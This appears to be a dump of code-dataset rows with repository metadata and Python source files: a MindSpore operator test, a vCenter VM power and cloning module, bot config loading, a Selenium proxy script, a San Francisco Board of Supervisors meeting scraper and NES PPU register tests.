hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b9dae700c2d4cf24d05cfadeff4203e1c2368b8f | 1,753 | py | Python | tests/st/ops/ascend/test_tbe_ops/test_greater.py | unseenme/mindspore | 4ba052f0cd9146ac0ccc4880a778706f1b2d0af8 | [
"Apache-2.0"
] | 2 | 2020-04-28T03:49:10.000Z | 2020-04-28T03:49:13.000Z | tests/st/ops/ascend/test_tbe_ops/test_greater.py | unseenme/mindspore | 4ba052f0cd9146ac0ccc4880a778706f1b2d0af8 | [
"Apache-2.0"
] | null | null | null | tests/st/ops/ascend/test_tbe_ops/test_greater.py | unseenme/mindspore | 4ba052f0cd9146ac0ccc4880a778706f1b2d0af8 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
from mindspore.ops import operations as P
from mindspore.nn import Cell
from mindspore.common.tensor import Tensor
from mindspore.train.model import Model
from mindspore import log as logger
from mindspore import context
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
@pytest.mark.ssd_tbe | 34.372549 | 78 | 0.691386 | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
from mindspore.ops import operations as P
from mindspore.nn import Cell
from mindspore.common.tensor import Tensor
from mindspore.train.model import Model
from mindspore import log as logger
from mindspore import context
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
class Greater(Cell):
    """Thin Cell wrapper around the TBE elementwise Greater operator."""
    def __init__(self):
        super(Greater, self).__init__()
        # Elementwise a > b comparison primitive.
        self.greater = P.Greater()
    def construct(self, inputa, inputb):
        """Return a boolean tensor marking positions where inputa > inputb."""
        comparison = self.greater(inputa, inputb)
        return comparison
def me_greater(inputa, inputb):
    """Run the Greater cell through a Model and return the prediction as numpy."""
    network = Greater()
    network.set_train()
    runner = Model(network)
    prediction = runner.predict(inputa, inputb)
    logger.info("Check input a: ")
    logger.info(inputa)
    logger.info("Check input b: ")
    logger.info(inputb)
    return prediction.asnumpy()
@pytest.mark.ssd_tbe
def test_greater_2d_scalar0():
    """Smoke-test Greater on two random int32 tensors of shape (8, 32)."""
    lhs = np.random.randint(-5, 5, [8, 32]).astype(np.int32)
    rhs = np.random.randint(-5, 5, [8, 32]).astype(np.int32)
    out_me = me_greater(Tensor(lhs), Tensor(rhs))
    logger.info("Check me result:")
logger.info(out_me) | 622 | -1 | 121 |
08172a7fdd318c375c9231880e991298a8fdd444 | 10,614 | py | Python | web2py/applications/rip/modules/VmOperations.py | 2spmohanty/vcenter-automation | 1d10b765ef335087902b0194ed12a61e53807987 | [
"Apache-2.0"
] | 1 | 2019-10-02T13:25:03.000Z | 2019-10-02T13:25:03.000Z | web2py/applications/rip/modules/VmOperations.py | 2spmohanty/vcenter-automation | 1d10b765ef335087902b0194ed12a61e53807987 | [
"Apache-2.0"
] | null | null | null | web2py/applications/rip/modules/VmOperations.py | 2spmohanty/vcenter-automation | 1d10b765ef335087902b0194ed12a61e53807987 | [
"Apache-2.0"
] | 1 | 2021-11-05T09:51:02.000Z | 2021-11-05T09:51:02.000Z | import pyVmomi
from pyVmomi import vim, vmodl
from DatacenterPrac import Login,GetCluster,GetDatacenter,get_obj,GetClusters
from clusterPrac import GetHostsInClusters
import status
from VMPrac import find_obj,get_container_view,collect_properties
import multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
import time
def vm_ops_handler_wrapper(args):
    """Unpack a packed argument tuple and forward it to vm_ops_handler.

    Needed because ThreadPool.map delivers a single object per call.
    """
    unpacked = tuple(args)
    return vm_ops_handler(*unpacked)
############################### Cloning Operation #####################
# Manager-backed list shared between worker threads so each
# vm_clone_operation call can publish its per-clone results.
synchObj=multiprocessing.Manager()
vm_result_list=synchObj.list()
def collect_vm_properties(service_instance, view_ref, obj_type, path_set=None,
                          include_mors=False,desired_vm=None):
    """
    Collect properties for managed objects from a view ref and return the
    first object whose property value equals `desired_vm`.
    Returns:
        A dict with keys 'name' (the matching property value) and 'obj'
        (the managed object); an empty dict if nothing matches or on error.
        NOTE(review): include_mors is currently unused - confirm intent.
    """
    collector = service_instance.content.propertyCollector
    # Create object specification to define the starting point of
    # inventory navigation
    obj_spec = pyVmomi.vmodl.query.PropertyCollector.ObjectSpec()
    obj_spec.obj = view_ref
    obj_spec.skip = True
    # Create a traversal specification to identify the path for collection
    traversal_spec = pyVmomi.vmodl.query.PropertyCollector.TraversalSpec()
    traversal_spec.name = 'traverseEntities'
    traversal_spec.path = 'view'
    traversal_spec.skip = False
    traversal_spec.type = view_ref.__class__
    obj_spec.selectSet = [traversal_spec]
    # Identify the properties to the retrieved
    property_spec = pyVmomi.vmodl.query.PropertyCollector.PropertySpec()
    property_spec.type = obj_type
    if not path_set:
        property_spec.all = True
    property_spec.pathSet = path_set
    # Add the object and property specification to the
    # property filter specification
    filter_spec = pyVmomi.vmodl.query.PropertyCollector.FilterSpec()
    filter_spec.objectSet = [obj_spec]
    filter_spec.propSet = [property_spec]
    # Retrieve properties
    props = collector.RetrieveContents([filter_spec])
    properties = {}
    try:
        # Linear scan: stop at the first property whose value matches.
        for obj in props:
            for prop in obj.propSet:
                if prop.val == desired_vm:
                    properties['name'] = prop.val
                    properties['obj'] = obj.obj
                    return properties
                else:
                    pass
    except Exception, e:
        print "The exception inside collector_properties " + str(e)
    return properties
| 30.412607 | 163 | 0.592896 | import pyVmomi
from pyVmomi import vim, vmodl
from DatacenterPrac import Login,GetCluster,GetDatacenter,get_obj,GetClusters
from clusterPrac import GetHostsInClusters
import status
from VMPrac import find_obj,get_container_view,collect_properties
import multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
import time
def vm_ops_handler(vm_name, vm_object, operation, final_result_dict, maxwait=5):
    """Power a VM on or off and record the outcome in final_result_dict.

    Args:
        vm_name: display name, used as the key in final_result_dict.
        vm_object: pyVmomi VirtualMachine managed object (may be None).
        operation: "on" or "off" (case-insensitive); anything else is rejected.
        final_result_dict: shared dict collecting per-VM result messages.
        maxwait: seconds to sleep between task-status polls.
    """
    op = operation.lower()
    # Bug fix: the original `elif operation != "on" or operation != "off"`
    # was always true, so a missing VM was misreported as an unimplemented
    # operation.  Reject unsupported operations explicitly instead.
    if op not in ("on", "off"):
        final_result_dict[vm_name] = "Operation %s not implemented." % operation
        return
    if not vm_object:
        final_result_dict[vm_name] = "VM object not found."
        return
    verb = "Power on" if op == "on" else "Power off"
    task = vm_object.PowerOn() if op == "on" else vm_object.PowerOff()
    # Single polling loop replaces the two duplicated on/off loops.
    while True:
        info = task.info
        if info.state == vim.TaskInfo.State.success:
            final_result_dict[vm_name] = "%s success." % verb
            if op == "on":
                # Original behaviour: give a powered-on VM time to settle.
                time.sleep(maxwait)
            break
        elif info.state == vim.TaskInfo.State.error:
            if info.error:
                final_result_dict[vm_name] = "%s has quit with error: %s" % (verb, info.error)
            else:
                final_result_dict[vm_name] = "%s has quit with cancelation" % verb
            break
        time.sleep(maxwait)
def vm_ops_handler_wrapper(args):
    """Adapter for ThreadPool.map: fan the packed argument tuple out to
    vm_ops_handler (map hands each worker a single object)."""
    packed_args = args
    return vm_ops_handler(*packed_args)
def executePowerOps(vcIp, vcUser, vcPassword,dcName,clusterName,operation,pattern_array,vm_array,maxwait):
    """Run a power operation ("on"/"off") on every VM matching each pattern.

    Logs in to the vCenter, resolves the datacenter and cluster, then fans
    the matching VMs out to vm_ops_handler over a 10-worker thread pool.
    Returns a dict of per-VM result messages on success, an error dict with
    an HTTP-style status on login/lookup failure, or an error string if the
    power operation itself raises.
    NOTE(review): vm_array is currently unused - confirm intent.
    """
    # Synchronized Object to Hold Results
    final_result_dict = {}
    try:
        si = Login(vcIp, vcUser, vcPassword)
    except Exception, e:
        resp = str(e)
        return dict(stat=resp, status=status.HTTP_403_FORBIDDEN)
    try:
        dcMor = find_obj(si, dcName, [vim.Datacenter], False)
        clusterMor = GetCluster(dcMor, clusterName, si)
        for pattern in pattern_array:
            vm_properties = ["name"]
            view = get_container_view(si, obj_type=[vim.VirtualMachine], container=clusterMor)
            vm_data = collect_properties(si, view_ref=view, obj_type=vim.VirtualMachine, path_set=vm_properties,include_mors=True, desired_vm=pattern)
            if any(vm_data):
                pass
            else:
                resp = 'Finding VM matching pattern %s failed .' % pattern
                return dict(stat=resp,status = status.HTTP_412_PRECONDITION_FAILED)
            vm_specs = []
            pool = ThreadPool(10)
            # One (name, object, op, shared-results, wait) tuple per VM.
            for vm_name, vm_object in vm_data.iteritems():
                vm_specs.append((vm_name, vm_object, operation, final_result_dict, maxwait))
            pool.map(vm_ops_handler_wrapper, vm_specs)
            pool.close()
            pool.join()
    except Exception,e:
        return "Power operation failed due to %s."%(e)
    return dict(final_result_dict)
############################### Cloning Operation #####################
# Manager-backed list shared between worker threads so each
# vm_clone_operation call can publish its per-clone results.
synchObj=multiprocessing.Manager()
vm_result_list=synchObj.list()
def vm_clone_operation(si,template_vm,datacenter,clones,specdict):
    """Clone `template_vm` `clones` times according to `specdict`.

    specdict keys used: "cluster", "datastore", "host" (optional), "power"
    ("on" powers the clones on) and "basename" (clone name prefix).
    Each clone task is polled until it succeeds, errors or is cancelled;
    the per-clone outcome map is appended to the shared `vm_result_list`.
    """
    global vm_result_list
    cls = specdict["cluster"]
    content = si.RetrieveContent()
    cluster = get_obj(content, [vim.ClusterComputeResource], cls)
    resource_pool = cluster.resourcePool
    folder = datacenter.vmFolder
    datastoresMors = datacenter.datastore
    dsname = specdict["datastore"]
    dsmor = None
    # Resolve the requested datastore by name within the datacenter.
    for datastore in datastoresMors:
        if datastore.info.name == dsname:
            dsmor = datastore
            break
    hostMors = GetHostsInClusters(datacenter, [cls], 'connected')
    hostname = specdict.get("host", None)
    hostmor = None
    if hostname:
        for hostitem in hostMors:
            if hostitem.name == hostname:
                hostmor = hostitem
                break
    relocate_spec = vim.vm.RelocateSpec()
    relocate_spec.pool = resource_pool
    relocate_spec.datastore = dsmor
    if hostmor:
        relocate_spec.host = hostmor
    power = False
    if specdict["power"] == "on":
        power = True
    vmresult = {}
    basename = specdict["basename"]
    for i in range(clones):
        vm_name = basename + "-" + str(i)
        try:
            clone_spec = vim.vm.CloneSpec(powerOn=power, template=False, location=relocate_spec)
            task = template_vm.Clone(name=vm_name, folder=folder, spec=clone_spec)
            run_loop = True
            # Poll the clone task every 10s until it reaches a final state.
            while run_loop:
                info = task.info
                if info.state == vim.TaskInfo.State.success:
                    vm = info.result
                    run_loop = False
                    vmresult[vm_name] = "Created"
                elif info.state == vim.TaskInfo.State.running:
                    pass
                elif info.state == vim.TaskInfo.State.queued:
                    pass
                elif info.state == vim.TaskInfo.State.error:
                    errormsg=None
                    try:
                        errormsg = info.error
                    except Exception, e:
                        vmresult[vm_name] = str(e)
                    if errormsg:
                        vmresult[vm_name] = errormsg
                    else:
                        vmresult[vm_name] = "Cancelled"
                    run_loop = False
                    break
                time.sleep(10)
        except Exception, e:
            # NOTE(review): this replaces the whole dict with a list,
            # discarding earlier per-clone results - confirm intent.
            vmresult = ["Failure while initiating cloning %s"%str(e)]
    vm_result_list.append(vmresult)
def collect_vm_properties(service_instance, view_ref, obj_type, path_set=None,
                          include_mors=False,desired_vm=None):
    """
    Collect properties for managed objects from a view ref and return the
    first object whose property value equals `desired_vm`.
    Returns:
        A dict with keys 'name' (the matching property value) and 'obj'
        (the managed object); an empty dict if nothing matches or on error.
        NOTE(review): include_mors is currently unused - confirm intent.
    """
    collector = service_instance.content.propertyCollector
    # Create object specification to define the starting point of
    # inventory navigation
    obj_spec = pyVmomi.vmodl.query.PropertyCollector.ObjectSpec()
    obj_spec.obj = view_ref
    obj_spec.skip = True
    # Create a traversal specification to identify the path for collection
    traversal_spec = pyVmomi.vmodl.query.PropertyCollector.TraversalSpec()
    traversal_spec.name = 'traverseEntities'
    traversal_spec.path = 'view'
    traversal_spec.skip = False
    traversal_spec.type = view_ref.__class__
    obj_spec.selectSet = [traversal_spec]
    # Identify the properties to the retrieved
    property_spec = pyVmomi.vmodl.query.PropertyCollector.PropertySpec()
    property_spec.type = obj_type
    if not path_set:
        property_spec.all = True
    property_spec.pathSet = path_set
    # Add the object and property specification to the
    # property filter specification
    filter_spec = pyVmomi.vmodl.query.PropertyCollector.FilterSpec()
    filter_spec.objectSet = [obj_spec]
    filter_spec.propSet = [property_spec]
    # Retrieve properties
    props = collector.RetrieveContents([filter_spec])
    properties = {}
    try:
        # Linear scan: stop at the first property whose value matches.
        for obj in props:
            for prop in obj.propSet:
                if prop.val == desired_vm:
                    properties['name'] = prop.val
                    properties['obj'] = obj.obj
                    return properties
                else:
                    pass
    except Exception, e:
        print "The exception inside collector_properties " + str(e)
    return properties
def vm_clone_handler_wrapper(args):
    """Unpack a packed argument list and forward it to vm_clone_operation
    (ThreadPool.map delivers a single object per call)."""
    return vm_clone_operation(*args)
def VMFullClones(vcitem):
    """Clone every template described in `vcitem` across its datacenters.

    vcitem layout: {"vcname", "username", "password", "dc": [{"dcname",
    "templates": [{"template", "container", "clones", "clonespecs"}]}]}.
    Template clone jobs are fanned out over a 4-worker thread pool; the
    aggregated per-clone outcomes are returned under the "result" key.
    """
    cloneresult = {}
    vcname = vcitem["vcname"]
    user = vcitem["username"]
    passw = vcitem["password"]
    dcarray = vcitem["dc"]
    for dcitem in dcarray:
        dcname = dcitem["dcname"]
        templatearray = dcitem["templates"]
        pool = ThreadPool(4)
        vm_specs = []
        for templateitem in templatearray:
            templatename = templateitem["template"]
            container = templateitem["container"]
            clones = templateitem["clones"]
            specdict = templateitem["clonespecs"]
            #print templatename + " will be cloned to " + str(clones) + " with Base name " + basename+ "-" + " with specs " + "VC " + vcname + " " + str(specdict)
            si = Login(vcname,user, passw)
            content = si.RetrieveContent()
            dcMor = GetDatacenter(name=dcname, si=si)
            clusterMorList = GetClusters(dcMor, [container])
            desiredClusterMor = None
            # Keeps the last cluster returned for the requested container.
            for item in clusterMorList:
                desiredClusterMor = item
            template_vm = None
            if templatename and desiredClusterMor:
                vm_properties = ["name"]
                view = get_container_view(si, obj_type=[vim.VirtualMachine], container=desiredClusterMor)
                try:
                    vm_data = collect_vm_properties(si, view_ref=view,
                                                    obj_type=vim.VirtualMachine,
                                                    path_set=vm_properties,
                                                    include_mors=True, desired_vm=templatename)
                    if vm_data['name'] == templatename:
                        template_vm = vm_data['obj']
                except Exception,e:
                    cloneresult[templatename] = "Template Not Found due to error %s"%str(e)
            # Fall back to a full inventory lookup before giving up.
            if template_vm is None:
                template_vm = get_obj(content, [vim.VirtualMachine], templatename)
            if template_vm is None:
                cloneresult[templatename] = "Template Not Found"
                continue
            vm_specs.append([si,template_vm,dcMor,clones,specdict])
        pool.map(vm_clone_handler_wrapper, vm_specs)
        pool.close()
        pool.join()
    cloneresult["result"] = list(vm_result_list)
    return cloneresult
| 7,966 | 0 | 115 |
711e7df3699b858ec5ecc93f2a9be8160a8cd912 | 759 | py | Python | __init__.py | Kurokitu/maimaiDX | 7c800ad220b300b6a71c36734a3a3f5c42dea796 | [
"MIT"
] | 31 | 2021-08-12T08:39:31.000Z | 2022-03-31T03:57:53.000Z | __init__.py | Kurokitu/maimaiDX | 7c800ad220b300b6a71c36734a3a3f5c42dea796 | [
"MIT"
] | 7 | 2021-09-12T17:47:36.000Z | 2022-03-10T00:50:49.000Z | __init__.py | Kurokitu/maimaiDX | 7c800ad220b300b6a71c36734a3a3f5c42dea796 | [
"MIT"
] | 14 | 2021-09-14T08:24:29.000Z | 2022-03-04T18:45:02.000Z | import os, json
from typing import List, Dict
from hoshino.log import new_logger
logger = new_logger('maimaiDX')
static = os.path.join(os.path.dirname(__file__), 'static')
arcades_json = os.path.join(os.path.dirname(__file__), 'arcades.json')
if not os.path.exists(arcades_json):
    # Bug fix: raising a plain string is a TypeError on Python 3;
    # raise a real exception instead.
    raise FileNotFoundError('请安装arcades.json文件')
arcades: List[Dict] = json.load(open(arcades_json, 'r', encoding='utf-8'))
config_json = os.path.join(os.path.dirname(__file__), 'config.json')
# Bug fix: check/create the config at the same absolute path it is read
# from below; the original tested the CWD-relative 'config.json' and could
# crash on load whenever the working directory was not the module dir.
if not os.path.exists(config_json):
    with open(config_json, 'w', encoding='utf-8') as f:
        json.dump({'enable': [], 'disable': []}, f)
config: Dict[str, List[int]] = json.load(open(config_json, 'r', encoding='utf-8'))
aliases_csv = os.path.join(static, 'aliases.csv')
| 34.5 | 83 | 0.677207 | import os, json
from typing import List, Dict
from hoshino.log import new_logger
logger = new_logger('maimaiDX')
static = os.path.join(os.path.dirname(__file__), 'static')
arcades_json = os.path.join(os.path.dirname(__file__), 'arcades.json')
if not os.path.exists(arcades_json):
    # Bug fix: raising a plain string is a TypeError on Python 3;
    # raise a real exception instead.
    raise FileNotFoundError('请安装arcades.json文件')
arcades: List[Dict] = json.load(open(arcades_json, 'r', encoding='utf-8'))
config_json = os.path.join(os.path.dirname(__file__), 'config.json')
# Bug fix: check/create the config at the same absolute path it is read
# from below; the original tested the CWD-relative 'config.json' and could
# crash on load whenever the working directory was not the module dir.
if not os.path.exists(config_json):
    with open(config_json, 'w', encoding='utf-8') as f:
        json.dump({'enable': [], 'disable': []}, f)
config: Dict[str, List[int]] = json.load(open(config_json, 'r', encoding='utf-8'))
aliases_csv = os.path.join(static, 'aliases.csv')
| 0 | 0 | 0 |
e302e4ab91ddf5d09900ee41e53487821c29002d | 848 | py | Python | functional test automation/webdriver/chromedriver with browsermob proxy on python/script.py | 4qu3l3c4r4/Automation-Test-Knowledge-Base | 7f6f1ba374d9277647bde6a7feaa6a6e8b53ae8f | [
"MIT"
] | 191 | 2015-01-11T10:47:03.000Z | 2022-03-14T09:14:50.000Z | functional test automation/webdriver/chromedriver with browsermob proxy on python/script.py | TATJAVAPavelKlindziuk/at.info-knowledge-base | 7f6f1ba374d9277647bde6a7feaa6a6e8b53ae8f | [
"MIT"
] | 2 | 2021-06-04T02:10:01.000Z | 2022-03-31T20:21:06.000Z | functional test automation/webdriver/chromedriver with browsermob proxy on python/script.py | TATJAVAPavelKlindziuk/at.info-knowledge-base | 7f6f1ba374d9277647bde6a7feaa6a6e8b53ae8f | [
"MIT"
] | 175 | 2015-01-09T16:45:09.000Z | 2022-02-12T23:54:23.000Z | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import NoSuchElementException,
ElementNotVisibleException
from browsermobproxy import Server
import urlparse
server = Server(r"c:\browsermob\bin\browsermob-proxy.bat")
server.start()
proxy = server.create_proxy()
proxy.new_har()
chrome_options = webdriver.ChromeOptions()
proxy = urlparse.urlparse(proxy.proxy).netloc
chrome_options.add_argument('--proxy-server=%s' % proxy)
driver = webdriver.Chrome(
executable_path=r"c:\chromedriver.exe",
chrome_options=chrome_options)
driver.get("http://google.com.ua/")
driver.find_element_by_id("gbqfsb").click()
print proxy.har
driver.quit()
server.stop()
| 30.285714 | 63 | 0.78066 | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import NoSuchElementException,
ElementNotVisibleException
from browsermobproxy import Server
import urlparse
server = Server(r"c:\browsermob\bin\browsermob-proxy.bat")
server.start()
proxy = server.create_proxy()
proxy.new_har()
chrome_options = webdriver.ChromeOptions()
proxy = urlparse.urlparse(proxy.proxy).netloc
chrome_options.add_argument('--proxy-server=%s' % proxy)
driver = webdriver.Chrome(
executable_path=r"c:\chromedriver.exe",
chrome_options=chrome_options)
driver.get("http://google.com.ua/")
driver.find_element_by_id("gbqfsb").click()
print proxy.har
driver.quit()
server.stop()
| 0 | 0 | 0 |
05c659702239746f12fc1478586571165ea4b702 | 5,498 | py | Python | city_scrapers/spiders/sf_bos.py | washabstract/city-scrapers-la | 574060aa25f81ceaf340fd0428c9cb97f5a70ed6 | [
"MIT"
] | null | null | null | city_scrapers/spiders/sf_bos.py | washabstract/city-scrapers-la | 574060aa25f81ceaf340fd0428c9cb97f5a70ed6 | [
"MIT"
] | 6 | 2021-03-15T04:47:44.000Z | 2022-03-07T21:16:20.000Z | city_scrapers/spiders/sf_bos.py | washabstract/city-scrapers-la | 574060aa25f81ceaf340fd0428c9cb97f5a70ed6 | [
"MIT"
] | 2 | 2022-01-12T21:45:44.000Z | 2022-01-20T02:36:46.000Z | from datetime import datetime
from urllib.parse import urljoin
from city_scrapers_core.constants import CLASSIFICATIONS, NOT_CLASSIFIED
from city_scrapers_core.spiders import CityScrapersSpider
from dateutil.parser import parse as datetime_parse
from city_scrapers.items import Meeting
| 36.899329 | 88 | 0.548017 | from datetime import datetime
from urllib.parse import urljoin
from city_scrapers_core.constants import CLASSIFICATIONS, NOT_CLASSIFIED
from city_scrapers_core.spiders import CityScrapersSpider
from dateutil.parser import parse as datetime_parse
from city_scrapers.items import Meeting
class SfBosSpider(CityScrapersSpider):
    """Scraper for San Francisco Board of Supervisors meetings (sfbos.org)."""
    name = "sf_bos"
    agency = "San Francisco Board of Supervisors"
    timezone = "America/Los_Angeles"
    start_urls = ["https://sfbos.org/events/calendar"]
    def parse(self, response):
        """
        `parse` should always `yield` Meeting items.
        Change the `_parse_title`, `_parse_start`, etc methods to fit your scraping
        needs.
        """
        meeting_table = response.css(".views-table tbody")
        # Site footer address is the default meeting location (Room 244).
        default_address = response.css("footer div.sf311::text").get().strip()
        for item in meeting_table.css("tr"):
            meeting = Meeting(
                title=self._parse_title(item),
                classification=self._parse_classification(item),
                start=self._parse_start(item),
                end=self._parse_end(item),
                all_day=self._parse_all_day(item),
                time_notes=self._parse_time_notes(item),
                location=self._parse_location(item, default_address),
                source=self._parse_source(response),
                created=datetime.now(),
                updated=datetime.now(),
            )
            meeting["status"] = self._get_status(meeting)
            meeting["id"] = self._get_id(meeting)
            # Follow each event detail page to fill description and links.
            yield response.follow(
                item.css('td.views-field-title a::attr("href")').get(),
                callback=self._parse_event,
                cb_kwargs={"meeting": meeting, "item": item},
                dont_filter=True,
            )
    def _parse_event(self, response, meeting, item):
        """Parse or generate event contents from event yield."""
        event_contents = None
        if "files" in response.url:
            # Direct file links (e.g. agendas) have no HTML body to parse.
            event_contents = response.url
            meeting["description"] = "More information: " + event_contents
        else:
            event_contents = response.css("article.node-event .content")
            meeting["description"] = event_contents.get()
        links = []
        if type(event_contents) is str:
            links.append(
                {"href": event_contents, "title": "Meeting/Agenda Information"}
            )
        else:
            # NOTE(review): new_link is built but never appended to `links` -
            # looks like a dropped `links.append(new_link)`; confirm before
            # changing the scraper's output.
            for link in event_contents.css(".field-type-link-field"):
                new_link = {
                    "href": link.css('a::attr("href")').get(),
                    "title": link.css("div.field-label::text").get(),
                }
                if "additional information link" in new_link["title"].lower():
                    new_link["title"] = "Meeting/Agenda Information"
            for link in event_contents.css("div.calendar-links a"):
                links.append(
                    {
                        "href": urljoin(response.url, link.css('::attr("href")').get()),
                        "title": link.css("::text").get(),
                    }
                )
        links.append(
            {
                "href": urljoin(
                    response.url,
                    item.css('td.views-field-title a::attr("href")').get(),
                ),
                "title": meeting["title"],
            }
        )
        meeting["links"] = links
        return meeting
    def _parse_title(self, item):
        """Parse or generate meeting title."""
        return item.css("td.views-field-title a::text").get()
    def _parse_classification(self, item):
        """Parse or generate classification from allowed options."""
        # NOTE(review): .get() may return None for a titleless row, which
        # would make the `in` test raise TypeError - confirm upstream data.
        for classification in CLASSIFICATIONS:
            if classification in item.css("td.views-field-title a::text").get():
                return classification
        return NOT_CLASSIFIED
    def _parse_start(self, item):
        """Parse start datetime as a naive datetime object."""
        return datetime_parse(item.css("span.date-display-single::text").get())
    def _parse_end(self, item):
        """Parse end datetime as a naive datetime object. Added by pipeline if None"""
        return None
    def _parse_time_notes(self, item):
        """Parse any additional notes on the timing of the meeting"""
        return ""
    def _parse_all_day(self, item):
        """Parse or generate all-day status. Defaults to False."""
        return False
    def _parse_location(self, item, default_address):
        """Parse or generate location."""
        loc_str = item.css("td.views-field-field-event-location-premise").get().strip()
        if "cancel" in loc_str.lower():
            return {
                "address": "",
                "name": "",
            }
        if "remote" in loc_str.lower():
            return {
                "address": "",
                "name": loc_str,
            }
        # Numeric location strings are City Hall room numbers; anything else
        # replaces the whole "Room 244" portion of the default address.
        try:
            int(loc_str)
        except ValueError:
            return {
                "address": default_address.replace("Room 244", loc_str),
                "name": "SF BOS " + loc_str,
            }
        else:
            return {
                "address": default_address.replace("244", loc_str),
                "name": "SF City Hall Room " + loc_str,
            }
    def _parse_source(self, response):
        """Return the URL this meeting's data was scraped from."""
        return response.url
| 0 | 5,186 | 23 |
2d46e2b1310c147d85ecf41a0b56fa86f3a1ad4b | 2,371 | py | Python | pynes/tests/ppu_test.py | timgates42/pyNES | e385c7189eca44b9a9e0e781b28c8562e0647b0b | [
"BSD-3-Clause"
] | 1,046 | 2015-02-10T02:23:58.000Z | 2022-03-16T02:42:02.000Z | pynes/tests/ppu_test.py | mcanthony/pyNES | 5f6078c02ae1fe9c6fecb4a8490f82f8c721cf3b | [
"BSD-3-Clause"
] | 30 | 2015-02-11T15:21:10.000Z | 2022-03-11T23:12:26.000Z | pynes/tests/ppu_test.py | mcanthony/pyNES | 5f6078c02ae1fe9c6fecb4a8490f82f8c721cf3b | [
"BSD-3-Clause"
] | 132 | 2015-05-28T14:55:04.000Z | 2021-12-09T18:58:45.000Z | import unittest
from pynes.game import PPU
| 37.046875 | 60 | 0.694644 | import unittest
from pynes.game import PPU
class PPUTest(unittest.TestCase):
    """Tests for the PPU ctrl and mask register bit flags.

    The historical "toogle" spelling is kept in the method names so the
    reported test IDs stay stable.  assertEquals (a deprecated alias) is
    replaced with assertEqual throughout.
    """
    def setUp(self):
        self.ppu = PPU()
    def tearDown(self):
        self.ppu = None
    def test_ppu_toogle_nmi(self):
        """nmi_enable drives bit 7 of the ctrl register."""
        self.assertEqual(0b00000000, self.ppu.ctrl)
        self.ppu.nmi_enable = True
        self.assertEqual(0b10000000, self.ppu.ctrl)
        self.assertEqual(True, self.ppu.nmi_enable)
        self.ppu.nmi_enable = False
        self.assertEqual(0b00000000, self.ppu.ctrl)
        self.assertEqual(False, self.ppu.nmi_enable)
    def test_ppu_toogle_sprite_table(self):
        """sprite_pattern_table selects bit 3 of ctrl."""
        self.assertEqual(0b00000000, self.ppu.ctrl)
        self.ppu.sprite_pattern_table = 1
        self.assertEqual(0b00001000, self.ppu.ctrl)
        self.ppu.sprite_pattern_table = 0
        self.assertEqual(0b00000000, self.ppu.ctrl)
    def test_ppu_toogle_background_table(self):
        """background_pattern_table selects bit 4 of ctrl."""
        self.assertEqual(0b00000000, self.ppu.ctrl)
        self.ppu.background_pattern_table = 1
        self.assertEqual(0b00010000, self.ppu.ctrl)
        self.ppu.background_pattern_table = 0
        self.assertEqual(0b00000000, self.ppu.ctrl)
    def test_ppu_toogle_sprite(self):
        """sprite_enable drives bit 4 of the mask register."""
        self.assertEqual(0b00000000, self.ppu.mask)
        self.ppu.sprite_enable = True
        self.assertEqual(0b00010000, self.ppu.mask)
        self.assertEqual(True, self.ppu.sprite_enable)
        self.ppu.sprite_enable = False
        self.assertEqual(0b00000000, self.ppu.mask)
        self.assertEqual(False, self.ppu.sprite_enable)
    def test_ppu_toogle_background(self):
        """background_enable drives bit 3 of the mask register."""
        self.assertEqual(0b00000000, self.ppu.mask)
        self.ppu.background_enable = True
        self.assertEqual(0b00001000, self.ppu.mask)
        self.assertEqual(True, self.ppu.background_enable)
